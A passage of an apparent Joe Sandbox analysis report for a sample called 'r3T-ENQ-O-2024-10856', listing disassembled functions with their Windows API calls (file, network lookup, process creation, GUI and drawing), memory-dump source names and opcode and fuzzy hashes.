                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C1916
                            • lstrcpyW.KERNEL32(00000000,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C193C
                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C1970
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen
                            • String ID: cdecl
                            • API String ID: 4031866154-3896280584
                            • Opcode ID: 9b9737baf5a92a832b1c61efb0c633dc03b105d5eddf5bc6c300497d3bd709ac
                            • Instruction ID: 03dbe15e0e9637b07bb0473ff3a33efcf6cccfb7875b2a1b2a09ee5c8408e8c7
                            • Opcode Fuzzy Hash: 9b9737baf5a92a832b1c61efb0c633dc03b105d5eddf5bc6c300497d3bd709ac
                            • Instruction Fuzzy Hash: 2B11BE36100305AFDB15AF74D855EBE77E8FF46350B40802EF846CB2A1EB71984187A1
                            Function 000C713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000C715C
                            • _memset.LIBCMT ref: 000C717D
                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000C71CF
                            • CloseHandle.KERNEL32(00000000), ref: 000C71D8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle_memset
                            • String ID:
                            • API String ID: 1157408455-0
                            • Opcode ID: 6a060ed3b59e0ab69e3010ebb24070b754ad57b5263327943fe6ca6923c01737
                            • Instruction ID: b3f6d7405fea726a64441d5fd02a2cdc19990a6ec0db704cbbc59706ed63abdc
                            • Opcode Fuzzy Hash: 6a060ed3b59e0ab69e3010ebb24070b754ad57b5263327943fe6ca6923c01737
                            • Instruction Fuzzy Hash: 4611CA759012287AD7305BA9AC4DFEFBABCEF45760F14419AF908E71D0D6744E808BA4
                            Function 000C13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000C13EE
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000C1409
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000C141F
                            • FreeLibrary.KERNEL32(?), ref: 000C1474
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                            • String ID:
                            • API String ID: 3137044355-0
                            • Opcode ID: a9a035aeee592b951f1c3ea0aa320cfe298796ec564ef1c5864b0096f3dcdf98
                            • Instruction ID: 4f36d28faf6e41f1c0f9a2fafc265fa636dc3dffda3b56731500ca5b991424de
                            • Opcode Fuzzy Hash: a9a035aeee592b951f1c3ea0aa320cfe298796ec564ef1c5864b0096f3dcdf98
                            • Instruction Fuzzy Hash: B2219D71500209EBEB249F90DC88FDEBBB8EF02704F00846DA55297452DB74EA44CB50
                            Function 000D92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000CAEA5,?,?,00000000,00000008), ref: 0009F282
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000CAEA5,?,?,00000000,00000008), ref: 0009F2A6
                            • gethostbyname.WSOCK32(?,?,?), ref: 000D92F0
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D92FB
                            • _memmove.LIBCMT ref: 000D9328
                            • inet_ntoa.WSOCK32(?), ref: 000D9333
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: 3b49309577e75651749783a10b8b782beeda69d08b734833bce9e728937eaca2
                            • Instruction ID: e9e292bf230cb2aaed1acb68824d1b805bd847c19963626b622949d6fa90857e
                            • Opcode Fuzzy Hash: 3b49309577e75651749783a10b8b782beeda69d08b734833bce9e728937eaca2
                            • Instruction Fuzzy Hash: 4E112B76A00109AFCB04FBA0DD56DEE77B9FF08315B144066F546A72A2DB30EE14DB61
                            Function 000BC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000BC285
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC297
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC2AD
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC2C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: c5055a37feb7684183ef73bc5e8347130c0bd44e8fc878a932353c0b01dae73f
                            • Instruction ID: be1793287847385ac292871bddfe6753705572562fa9bb682251694584e5184e
                            • Opcode Fuzzy Hash: c5055a37feb7684183ef73bc5e8347130c0bd44e8fc878a932353c0b01dae73f
                            • Instruction Fuzzy Hash: 5211187A940218FFEB11DBD8C885EDDBBB4FB08710F2040A1EA05B7294D671AE10DB94
                            Function 000C7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 000C7C6C
                            • MessageBoxW.USER32(?,?,?,?), ref: 000C7C9F
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000C7CB5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000C7CBC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2880819207-0
                            • Opcode ID: 0347f94a872c11e177a777970c511eddfd8703741f5c9732120dcfe70f9b74f6
                            • Instruction ID: bd2d57a41a509ae7882874a892fe6ea159ec1168e8663aa1aeeac7911d620b42
                            • Opcode Fuzzy Hash: 0347f94a872c11e177a777970c511eddfd8703741f5c9732120dcfe70f9b74f6
                            • Instruction Fuzzy Hash: 5F110876A04204ABC7129BACAC48FDE7FAD9B45324F144259F569D32A1D6B089848BA0
                            Function 0009C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                            • GetStockObject.GDI32(00000011), ref: 0009C66B
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateMessageObjectSendStockWindow
                            • String ID:
                            • API String ID: 3970641297-0
                            • Opcode ID: b1ead1f0f9357b23ff55422cd79fd7ece05121f190d90f52db8023433faa055a
                            • Instruction ID: c5fcae9dcf721402daff6fb4288c5e2e9af4e0a1ed95713673f62f79913c71ed
                            • Opcode Fuzzy Hash: b1ead1f0f9357b23ff55422cd79fd7ece05121f190d90f52db8023433faa055a
                            • Instruction Fuzzy Hash: 5A118072901649BFEF128FA4DC54EEABBA9FF09364F054215FA5452160C772DCA0EBA0
                            Function 000C49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C49EE
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A13
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A1D
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: 2a6798740aa3565b50551c27b1dbfabecc55dfdb720dc080f9023a6a269ea9e3
                            • Instruction ID: 4ad3da671132176b0bd3e2f93b57120508277aa3d4d2e9831aef1f439dcee804
                            • Opcode Fuzzy Hash: 2a6798740aa3565b50551c27b1dbfabecc55dfdb720dc080f9023a6a269ea9e3
                            • Instruction Fuzzy Hash: BB113C71D40528DBCF00EFE5E959BEEBB74FF08751F015059E941B2150CB709990CB9A
                            Function 000B5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                            • Instruction ID: 0e3ce694fb053b6693828b434c59e3547fde07335633d85a3df1b2cf1de02d13
                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                            • Instruction Fuzzy Hash: B101363240064EBBCF525E88DC41DEE7FA2BB18351F588855FA1859022D337CAB2AB81
                            Function 000A80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A869D: __getptd_noexit.LIBCMT ref: 000A869E
                            • __lock.LIBCMT ref: 000A811F
                            • InterlockedDecrement.KERNEL32(?), ref: 000A813C
                            • _free.LIBCMT ref: 000A814F
                            • InterlockedIncrement.KERNEL32(00A268A8), ref: 000A8167
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 2704283638-0
                            • Opcode ID: 1904226c44ea90258a05d648db6bb27675469b46ccb8b09970b279edf945186b
                            • Instruction ID: e1cb2c4d42b57986fc087668a599c7df04a07779850818f6d0664e32bbba48a3
                            • Opcode Fuzzy Hash: 1904226c44ea90258a05d648db6bb27675469b46ccb8b09970b279edf945186b
                            • Instruction Fuzzy Hash: 3601D2319016119BCB55AFE4980A7ED77A4BF06714F048518F454A7692CF345C82CFD2
                            Function 000A8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __lock.LIBCMT ref: 000A8768
                              • Part of subcall function 000A8984: __mtinitlocknum.LIBCMT ref: 000A8996
                              • Part of subcall function 000A8984: EnterCriticalSection.KERNEL32(000A0127,?,000A876D,0000000D), ref: 000A89AF
                            • InterlockedIncrement.KERNEL32(DC840F00), ref: 000A8775
                            • __lock.LIBCMT ref: 000A8789
                            • ___addlocaleref.LIBCMT ref: 000A87A7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                            • String ID:
                            • API String ID: 1687444384-0
                            • Opcode ID: 8db8a4d20f62c03c10ed9214ebe7a9a92437c6ab3e66432b37ebc3825621bb17
                            • Instruction ID: 508f384b2529a0c96a448a7aedc9a03a437107e46f18cecfedebe26271706bd8
                            • Opcode Fuzzy Hash: 8db8a4d20f62c03c10ed9214ebe7a9a92437c6ab3e66432b37ebc3825621bb17
                            • Instruction Fuzzy Hash: 7D012D72405B00AFD760EFB5D90679AF7E0FF55725F20C90EE499976A2DBB0A640CB01
                            Function 000EE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000EE14D
                            • _memset.LIBCMT ref: 000EE15C
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00143EE0,00143F24), ref: 000EE18B
                            • CloseHandle.KERNEL32 ref: 000EE19D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3277943733-0
                            • Opcode ID: 8b2d009d7feae80c854485525a78cef1d1f01d7208f32a07cc44e6833775c5ec
                            • Instruction ID: f1a77a072db53bbfd2c4392f6a6e4e00d57366ff0b515c1d49986fcd5ee8ddfa
                            • Opcode Fuzzy Hash: 8b2d009d7feae80c854485525a78cef1d1f01d7208f32a07cc44e6833775c5ec
                            • Instruction Fuzzy Hash: 2FF082F5941314BFF2105BA5AC06FB77AACDB0B3A4F000420BE18E55B2D7B68E8086B5
                            Function 000C9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 000C9C7F
                              • Part of subcall function 000CAD14: _memset.LIBCMT ref: 000CAD49
                            • _memmove.LIBCMT ref: 000C9CA2
                            • _memset.LIBCMT ref: 000C9CAF
                            • LeaveCriticalSection.KERNEL32(?), ref: 000C9CBF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: 90694555cd2fb738f7e45d695565564fd7ffcf21dcebeecf4ce8f42957916a0f
                            • Instruction ID: 08b5cfdd580db023cf840d9a7faafa9f70c29b0bd895c8461d663e2f51ae3fde
                            • Opcode Fuzzy Hash: 90694555cd2fb738f7e45d695565564fd7ffcf21dcebeecf4ce8f42957916a0f
                            • Instruction Fuzzy Hash: F6F05E7A201004ABCF016F94EC85E9ABB29EF45321F08C065FE099E217CB71E811DBB5
                            Function 000EE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B5FA
                              • Part of subcall function 0009B58B: BeginPath.GDI32(?), ref: 0009B611
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B63B
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EE860
                            • LineTo.GDI32(00000000,?,?), ref: 000EE86D
                            • EndPath.GDI32(00000000), ref: 000EE87D
                            • StrokePath.GDI32(00000000), ref: 000EE88B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                            • String ID:
                            • API String ID: 1539411459-0
                            • Opcode ID: 8464d705bde2a99992c94b2047b7822d29dd4263b35a8f6aa174f69d2f936edb
                            • Instruction ID: 200ee405f9cfbd7cd86450c595bbf91da5ded8d1b1398bb1235628fc1c396945
                            • Opcode Fuzzy Hash: 8464d705bde2a99992c94b2047b7822d29dd4263b35a8f6aa174f69d2f936edb
                            • Instruction Fuzzy Hash: ADF0E23100129ABBDB162F90BC0DFCE3F99AF06310F008100FA49214E18BB54591CFD5
                            Function 000BD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BD640
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD653
                            • GetCurrentThreadId.KERNEL32 ref: 000BD65A
                            • AttachThreadInput.USER32(00000000), ref: 000BD661
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 0b72fbbf5f7e09c61274ce105d7e18c2526b56690542506d01c17645dca9aeef
                            • Instruction ID: 2a29baf75656f7634366d5dee9bad165735663329daf39d6bdcf8a214732fdf3
                            • Opcode Fuzzy Hash: 0b72fbbf5f7e09c61274ce105d7e18c2526b56690542506d01c17645dca9aeef
                            • Instruction Fuzzy Hash: 31E0ED71541228BADB205FA2EC0DFDBBF6CEF557A1F408011B54D95460DEB6D5C0CBA0
                            Function 0009B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000008), ref: 0009B0C5
                            • SetTextColor.GDI32(?,000000FF), ref: 0009B0CF
                            • SetBkMode.GDI32(?,00000001), ref: 0009B0E4
                            • GetStockObject.GDI32(00000005), ref: 0009B0EC
                            • GetWindowDC.USER32(?,00000000), ref: 000FECFA
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 000FED07
                            • GetPixel.GDI32(00000000,?,00000000), ref: 000FED20
                            • GetPixel.GDI32(00000000,00000000,?), ref: 000FED39
                            • GetPixel.GDI32(00000000,?,?), ref: 000FED59
                            • ReleaseDC.USER32(?,00000000), ref: 000FED64
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: ae0d4a8eefce529fac71ca544618a6dc7c55e6362b070ab10c618d8c5c592d5a
                            • Instruction ID: 8f83a539e56955ac90b28a531a64dd57597f973178029543e80c8060fcde843c
                            • Opcode Fuzzy Hash: ae0d4a8eefce529fac71ca544618a6dc7c55e6362b070ab10c618d8c5c592d5a
                            • Instruction Fuzzy Hash: 87E06D31100284AEEF211FB8FC097983F61AB45335F008226FBA9584E2CBB14580DB11
